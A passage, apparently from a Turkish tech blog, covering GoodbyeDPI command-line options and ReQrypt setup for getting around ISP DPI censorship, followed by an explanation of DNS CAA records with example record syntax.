IPv6 address (experimental) --dnsv6-port <value> redirect UDPv6 DNS requests to the supplied port (53 by default) --dns-verb print verbose DNS redirection messages --blacklist <txtfile> perform circumvention tricks only to host names and subdomains from supplied text file (HTTP Host/TLS SNI). This option can be supplied multiple times. --allow-no-sni perform circumvention if TLS SNI can't be detected with --blacklist enabled. --set-ttl <value> activate Fake Request Mode and send it with supplied TTL value. DANGEROUS! May break websites in unexpected ways. Use with care (or --blacklist). --auto-ttl [a1-a2-m] activate Fake Request Mode, automatically detect TTL and decrease it based on a distance. If the distance is shorter than a2, TTL is decreased by a2. If it's longer, (a1; a2) scale is used with the distance as a weight. If the resulting TTL is more than m(ax), set it to m. Default (if set): --auto-ttl 1-4-10. Also sets --min-ttl 3. DANGEROUS! May break websites in unexpected ways. Use with care (or --blacklist). --min-ttl <value> minimum TTL distance (128/64 - TTL) for which to send Fake Request in --set-ttl and --auto-ttl modes. --wrong-chksum activate Fake Request Mode and send it with incorrect TCP checksum. May not work in a VM or with some routers, but is safer than set-ttl. --wrong-seq activate Fake Request Mode and send it with TCP SEQ/ACK in the past. --native-frag fragment (split) the packets by sending them in smaller packets, without shrinking the Window Size. Works faster (does not slow down the connection) and better. --reverse-frag fragment (split) the packets just as --native-frag, but send them in the reversed order. Works with the websites which could not handle segmented HTTPS TLS ClientHello (because they receive the TCP flow "combined"). --max-payload [value] packets with TCP payload data more than [value] won't be processed. Use this option to reduce CPU usage by skipping huge amount of data (like file transfers) in already established sessions. May skip some huge HTTP requests from being processed. Default (if set): --max-payload 1200.LEGACY modesets: -1 -p -r -s -f 2 -k 2 -n -e 2 (most compatible mode) -2 -p -r -s -f 2 -k 2 -n -e 40 (better speed for HTTPS yet still compatible) -3 -p -r -s -e 40 (better speed for HTTP and HTTPS) -4 -p -r -s (best speed)Modern modesets (more stable, more compatible, faster): -5 -f 2 -e 2 --auto-ttl --reverse-frag --max-payload (this is the default) -6 -f 2 -e 2 --wrong-seq --reverse-frag --max-payload
ISS’nizin DPI’sının atlatılıp atlatılamayacağını kontrol etmek için, önce tarayıcınızda “Güvenli DNS (HTTPS üzerinden DNS)” seçeneğini etkinleştirerek sağlayıcınızın DNS yanıtlarına nasıl tepki verdiğini kontrol edin.
Tarayıcılarda Güvenli DNS yapılandırmak için;
Chrome: Settings → Privacy and security → Use secure DNS → With: NextDNS
Firefox: Settings → Network Settings → Enable DNS over HTTPS → Use provider: NextDNS
Direk olarak goodbyedpi.exe çalıştırdığınızda yasaklı sitelere giriş için çalışıyor ise şanslısınız hiçbir işlem yapmadan olduğu gibi uygulamayı kullanabilirsiniz. Engellenen web sitelerin listesini biliyorsanız bir dosya hazırlayabilir içerisine erişmek istediğiniz yerleri yazabilir ve goodbyedpi.exe --blacklist turkey-blocklist.txt diyerek çalıştırabilirsiniz böylelikle sadece belirttiğiniz siteler için uygulamayı çalıştırabilirsiniz.
Eğer sağlayıcınız DNS isteklerini engelliyorsa ve/veya zehirliyorsa, standart olmayan bağlantı noktalarını kullanarak erişim engellerini atlatabilirsiniz. Örneğin (CloudFlare DNS 1.1.1.1:1253 gibi) bunu yapabilmek için --dns-addr seçeneğini kullanın veya TLS üzerinden HTTPS seçeneklerini deneyin.
ReQrypt sansürü atlamak için ücretsiz bir şifreleme aracıdır. DNS trafiğiniz ve yapılan HTTP isteklerini şifreler
Sağlayıcı tabanlı aşağıda uygulanan erişim denetlemelerine karşı koymak için geliştirilmiştir;
ISP düzeyinde URL filtreleme
ISP düzeyinde data-logging/snooping sistemleri
ISP düzeyinde transparent proxy
ReQrypt Nasıl Çalışır?
Diğer anti-sansür araçlarından farklı olarak, ReQrypt, vekil sunucu sitemlerine dayanmaz IP adresinizi değiştirmez. Bunun yerine, ReQrypt kullanıcıya kontrol edebilen bir yönlendirme imkânı sağlar. Bu, sağlayıcının uyguladığı erişim engeli yöntemlerini atlatmasına imkân tanır.
ReQrypt proxy sunuculara yönlendirme yapmadığından IP adresini değiştirmez. Uzak web sunucusuna trafik doğrudan bilgisayarınızdan değiştirilmemiş olarak gönderilmiş gibi görünür.
Gelen paketler doğrudan web sunucusundan tarayıcınıza gönderildiğinden ve proxy sunucusu aracılığıyla gönderilmediğinden, ReQrypt son derece hızlıdır. Bir proxy sunucusunu çalıştırmak ve yönetmekten daha uygun olmakla birlikte güvenlidir.
Nasıl Kullanılır
Sisteminize uygun olan ReQrypt aşağıdaki link aracılığı ile indirilir.
Önerilen ayar olan IPv6 Özelliği kapatılır. 3. Windows: Denetim Masası → Ağ ve Paylaşım Merkezi → Etkin ağlarınızı görüntüleyin → Yerel Ağ Bağlantısı → Özellikler → Internet Protokolü Sürüm 6 (TCP / IPv6) kutucuğundaki tiki kaldırın ve kayıt edip kapatın.
Kullanılan DNS’ler CloudFlare DNS (1.1.1.1, 1.0.0.1) ile değiştirilir.
ReQrypt Başlatılır.
İhtiyaca göre yapılandırması yapılarak daha efektif hale getirilebilir.
IPv6’yı etkin ise, ReQrypt’i kullanmadan önce devre dışı bırakmanız gerekmektedir. Şu anda ReQrypt IPv6 trafiğini yok saymaktadır.
Eğer ki yukarıda anlattıklarım işe yaramamışsa, en iyi vpn programları makalesine göz atarak yasaklı sitelere giriş imkânı sağlayan alakalı firmaları inceleyebilirsiniz…
Sertifika Yetkilisi Yetkilendirme (CAA) kaydı, bir etki alanı için sertifika vermek için hangi sertifika yetkililerinin (CA’lar) izin verildiğini belirtmek için kullanılır.
Sertifika Yetkilisi Yetkilendirme (CAA) DNS Kaynak Kaydı, DNS etki alanı adı sahibinin bir veya daha fazla Sertifika belirtmesine olanak tanır. Bu etki alanı için sertifika vermeye yetkili makamlar (CA’lar). CAA Kaynak Kayıtları, bir Kamu Sertifika Otoritesinin İstenmeyen riski azaltmak için ek denetimler uygulayın sertifika yanlış yayını Bu belge CAA’nın sözdizimini tanımlar, sertifika veren kuruluşlar tarafından CAA kayıtlarının işlenmesi için kayıt ve kurallar bütünüdür.
Herhangi bir CAA kaydı mevcut değilse, herhangi bir CA’ya alan adı için bir sertifika vermesine izin verilir. Bir CAA kaydı varsa, kayıtlarda listelenen CA’lara yalnızca bu ana makine adı için sertifika verilmesine izin verilir. İzinsiz sertifika üretimi bu şekilde sonlandırılmaya çalışılmıştır.
CAA kayıtları, tüm alan adı veya belirli ana makine adları için ilkeler belirleyebilir. CAA kayıtları alt alanlar tarafından da devralınır; bu nedenle, mertcangokgoz.com ‘da belirlenen bir CAA kaydı, alt alan doc.mertcangokgoz.com gibi herhangi bir alt alana (geçersiz kılınmadığı sürece) uygulanır. CAA kayıtları, tekli ad sertifikalarını, wildcard sertifikaları veya her ikisini birden kontrol edebilir. Daha fazlası için RFC 6844
CAA kayıt formatı
CAA <flags> <tag> <value>
RFC şu anda 3 mevcut etiketi tanımlıyor:
issue: tek bir sertifika yetkilisine, ana makine adı için bir sertifika (herhangi bir tür) verme yetkisi verir.
issuewild: tek bir sertifika yetkilisine, ana makine adı için bir wildcard sertifika (ve yalnızca *.example.com) verme yetkisi verir.
iodef: bir sertifika yetkilisinin politika ihlallerini rapor edebileceği bir URL’yi belirtir.
CAA kayıt kullanımı
Format bölümünde açıklandığı gibi, her CAA kaydı yalnızca bir tag – value çifti içerir. tag, şu anda kullanılabilen etiketlerden biri olmalıdır.
Örneğin, mertcangokgoz.com için SSL sertifikalarının verilmesini Let’s Encrypt sertifika yetkilisine sınırlamak istiyorsak, aşağıdaki CAA kaydını eklemeliyiz:
mertcangokgoz.com. CAA 0 issue "letsencrypt.org"
Hem Let’s Encrypt hem de Comodo’ya izin vermek istiyorsak, her CA için bir tane olmak üzere 2 CAA kaydı eklememiz gerekir:
